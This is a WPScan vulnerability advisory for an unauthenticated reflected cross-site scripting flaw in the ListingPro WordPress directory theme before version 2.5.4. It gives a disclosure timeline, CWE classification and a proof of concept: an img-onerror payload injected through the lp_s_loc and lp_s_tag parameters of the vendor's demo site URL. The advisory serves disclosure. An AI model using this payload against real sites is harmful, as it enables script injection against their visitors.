ListingPro < 2.5.4 - Unauthenticated Reflected XSS



Description
Reflected XSS was discovered in the «ListingPro - WordPress Directory Theme», tested version — v2.5.3


Edit - WPScanTeam:
January 13th, 2020 - Report Received & Envato Contacted
January 13th, 2020 - Envato Investigating
January 15th, 2020 - Theme updated, v2.5.4, fixing the issue
Proof of Concept
----[]- Info: -[]----
Demo website: https://classic.listingprowp.com/


----[]- Reflected XSS: -[]----
Payload Sample: "><img src=x onerror=(alert)(`m0ze`);//">

PoC: https://classic.listingprowp.com/?select=&lp_s_loc="><img src=x onerror=(alert)(`m0ze`);//">&lp_s_tag="><img src=x onerror=(alert)(`m0ze`);//">&lp_s_cat=&s=home&post_type=listing

Affects Theme

fixed in version 2.5.4

References

URL https://themeforest.net/item/listingpro-multipurpose-directory-theme/19386460

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Original Researcher m0ze
Submitter m0ze
Submitter Twitter m0ze_ru
Views 6915
Verified No
WPVDB ID 10025

Timeline

Publicly Published 2020-01-15 (3 months ago)
Added 2020-01-15 (3 months ago)
Last Updated 2020-01-20 (3 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin